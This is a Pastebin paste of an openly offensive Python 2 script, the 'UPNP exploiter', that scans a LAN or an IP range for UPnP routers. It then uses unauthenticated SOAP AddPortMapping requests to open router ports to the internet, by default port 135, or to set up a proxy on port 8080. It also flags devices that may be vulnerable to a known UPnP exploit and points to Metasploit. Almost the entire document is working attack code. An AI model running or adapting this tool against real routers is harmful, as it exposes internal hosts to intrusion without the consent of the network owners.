Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/python
- import urllib2, re, sys, select, socket
- ###
- # Some static info
- ##
- tport = 49170;
- upnport = 1900;
- msg = "M-SEARCH * HTTP/1.1\r\nHOST: 255.255.255.250:1900\r\nST: ssdp:all\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\n\r\n";
- ###
- # Used to ping one target.
- ###
- def target():
- data = []
- try:
- tar = sys.argv[2];
- if sys.argv[2].find("*") != -1:
- star = sys.argv[2].split(".*");
- i = 1;
- while i < 255:
- tar = star[0]+"."+str(i)
- print "Sending UPNP packets to "+tar;
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);
- s.bind(("", tport));
- s.sendto(msg, (tar, upnport));
- i += 1;
- else:
- print "Sending UPNP packets to "+tar;
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);
- s.bind(("", tport));
- s.sendto(msg, (tar, upnport));
- print "Waiting for data";
- print "Press Ctrl+c at anytime to stop capture";
- while True:
- string, addr = s.recvfrom(1024);
- data.append([addr[0], string]);
- print "Got some data";
- except KeyboardInterrupt:
- s.close();
- proc(data);
- ###
- # Used to ping lan
- ###
- def lan():
- #data = "";
- data = [];
- try:
- print "Sending broadcast UPNP packets to lan";
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);
- s.bind(("", tport));
- s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1);
- s.sendto(msg, ("239.255.255.250", 1900));
- print "Waiting for data";
- print "Press Ctrl+c at anytime to stop capture";
- while True:
- res = select.select([s],[],[]);
- string, addr = res[0][0].recvfrom(1024);
- #data += string;
- data.append([addr[0], string]);
- print "Got some data";
- except KeyboardInterrupt:
- s.close();
- proc(data);
- ###
- # open ports on routers
- ###
- def sploit(host):
- #print host;
- #exit(1);
- print "LOL you are evil";
- rhost = re.findall("([^/]+)", host);
- print "Well here goes nothing...";
- print "Trying to get some info from the target...";
- try:
- res = urllib2.urlopen(host).read();
- res = res.replace("\r", "");
- res = res.replace("\n", "");
- res = res.replace("\t", "");
- pres = res.split("<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>");
- p2res = pres[1].split("</controlURL>");
- p3res = p2res[0].split("<controlURL>");
- ctrl = p3res[1];
- rip = res.split("<presentationURL>");
- rip1 = rip[1].split("</presentationURL>");
- routerIP = rip1[0];
- print "Router internal IP: "+routerIP;
- print "Ports already open:";
- print "INT:EXT:ADDR:Desc";
- i=1;
- try:
- while True:
- opmsg = '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetGenericPortMappingEntry xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingIndex>'+str(i)+'</NewPortMappingIndex></u:GetGenericPortMappingEntry></s:Body></s:Envelope>';
- open_ports = urllib2.Request("http://"+rhost[1]+""+ctrl, opmsg);
- open_ports.add_header("SOAPACTION", '"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry"');
- open_ports.add_header('Content-type', 'application/xml');
- open_res = urllib2.urlopen(open_ports).read();
- int1 = open_res.split('<NewInternalPort>');
- int2 = int1[1].split('</NewInternalPort>');
- intport = int2[0];
- ext1 = open_res.split('<NewExternalPort>');
- ext2 = ext1[1].split('</NewExternalPort>');
- extport = ext2[0];
- addr = open_res.split('<NewInternalClient>');
- addr1 = addr[1].split('</NewInternalClient>');
- address = addr1[0];
- des = open_res.split('<NewPortMappingDescription>');
- des1 = des[1].split('</NewPortMappingDescription>');
- desc = des1[0];
- print intport+":"+extport+":"+address+":"+desc
- i=i+1;
- except Exception, e:
- err=""
- except Exception, e:
- #print e;
- print "Failed to get anything from the target :/"
- IP = raw_input("IP of internal host to forward posts to: [192.168.1.100] ");
- if IP == "":
- IP = "192.168.1.100";
- port = raw_input("Port of internal host you want to forward to the net: [135] ");
- if port == "":
- port = "135";
- extport = raw_input("External port: [135] ");
- if extport == "":
- extport = "135";
- msg = '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>'+extport+'</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>'+port+'</NewInternalPort><NewInternalClient>'+IP+'</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>hax0r</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>';
- try:
- req = urllib2.Request("http://"+rhost[1]+""+ctrl, msg);
- req.add_header('SOAPAction', '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"');
- req.add_header('Content-type', 'application/xml');
- res = urllib2.urlopen(req);
- print "HOLY SHIT IT WORKED!!!";
- except Exception, e:
- print e;
- print "Shit it didnt work y0 :/";
- ###
- # here we try to set up a proxy
- ###
- def proxy(host):
- try:
- print "LOL you are evil";
- rhost = re.findall("([^/]+)", host);
- print "Well here goes nothing...";
- res = urllib2.urlopen(host).read();
- res = res.replace("\r", "");
- res = res.replace("\n", "");
- res = res.replace("\t", "");
- pres = res.split("<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>");
- p2res = pres[1].split("</controlURL>");
- p3res = p2res[0].split("<controlURL>");
- ctrl = p3res[1];
- IP = raw_input("IP the proxy connects to: [192.168.1.100] ");
- if IP == "":
- IP = "192.168.1.100";
- extport = raw_input("External port: [8080] ");
- if extport == "":
- extport = "8080";
- msg = '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>'+extport+'</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort><NewInternalClient>'+IP+'</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>hax0r</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>';
- req = urllib2.Request("http://"+rhost[1]+""+ctrl, msg);
- req.add_header('SOAPAction', '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"');
- req.add_header('Content-type', 'application/xml');
- try:
- res = urllib2.urlopen(req);
- print "HOLY SHIT IT WORKED!!!";
- except Exception, e:
- print e;
- print "Shit it didnt work y0 :/";
- except Exception, e:
- print e;
- ###
- # here we pick our attack
- ###
- def choose(host):
- print "1) Open ports.";
- print "2) Open proxy.";
- meth = raw_input("Which attack you wanna do?: [1] ");
- if meth == "1":
- sploit(host);
- if meth == "2":
- proxy(host);
- if meth == "":
- sploit(host);
- ###
- # Proccess data from lan or target
- ###
- def proc(data):
- if len(data) == 0:
- done("");
- print "\r\nWorking with the data we got...";
- pdata = dict((x[0], x) for x in data).values()
- rh = [];
- for L in pdata:
- rh.append(L[0]);
- hosts = [];
- pd = [];
- print "Making a few connections...";
- for host in rh:
- try:
- spot = rh.index(host);
- hdata = pdata[spot][1];
- url = "http://"+host+":";
- port = re.findall("http:\/\/[0-9\.]+:(\d.+)", hdata);
- url += port[0];
- p = urllib2.urlopen(url, timeout=3);
- rd = re.findall("schemas-upnp-org:device:([^:]+)", p.read());
- if rd[0] == "InternetGatewayDevice":
- addr = re.findall("http://([^:]+)", url);
- vuln = "Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1";
- if hdata.find(vuln) != -1:
- d = raw_input(addr[0]+" might be open to the unique_service_name() exploit, open msf and give it a go. For more information goto this URL - http://www.osvdb.org/show/osvdb/89611 Press enter to continue.");
- #yesnosploit = raw_input(addr[0]+" is a router, do you want to try to open ports? (Y)es/(N)o: ");
- yesnosploit = raw_input(addr[0]+" is a router/modem, do you want to try to exploit is?: (Y)es/(n)o ");
- if yesnosploit.lower() == "y":
- choose(url);
- if yesnosploit == "":
- choose(url);
- pd.append([url, rd[0]]);
- except:
- err = "";
- pd.append([url, "Could not connect..."]);
- done(pd);
- ###
- # This func displays info we got
- ###
- def done(data):
- if len(data) == 0:
- print "\r\nNo UPNP supported devices found :(";
- ###
- # Welcome msg
- ###
- print "";
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
- exit(1);
- for info in data:
- # if sys.argv[1] == "target":
- # port = re.findall("([^:]+)", info[0]);
- # path = re.findall("([^/]+)", info[0]);
- # print "Device UPNP info page: http://"+sys.argv[2]+":"+port[2];
- # else:
- # print "Device UPNP info page: "+info[0];
- print "Device UPNP info page: "+info[0];
- print "Device type: "+info[1]+"\r\n";
- print "Done!";
- print "";
- ###
- # Welcome msg
- ###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
- exit(1);
- ###
- # display usage
- ###
- def usage():
- ###
- # Welcome msg
- ###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
- print "";
- print "upnp.py type ip";
- print "Types: lan/target";
- print "IP is only needed is using type target";
- print "scan ip range using *";
- print "i.e: python upnp.py target 123.456.789.*";
- print "Many thanks to Ngharo for all his help making this script";
- exit(1);
- ###
- # parse argv and direct to right func
- ###
- if len(sys.argv) == 1:
- usage();
- elif sys.argv[1] == "lan":
- lan();
- elif sys.argv[1] == "target":
- target();
- else:
- usage();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement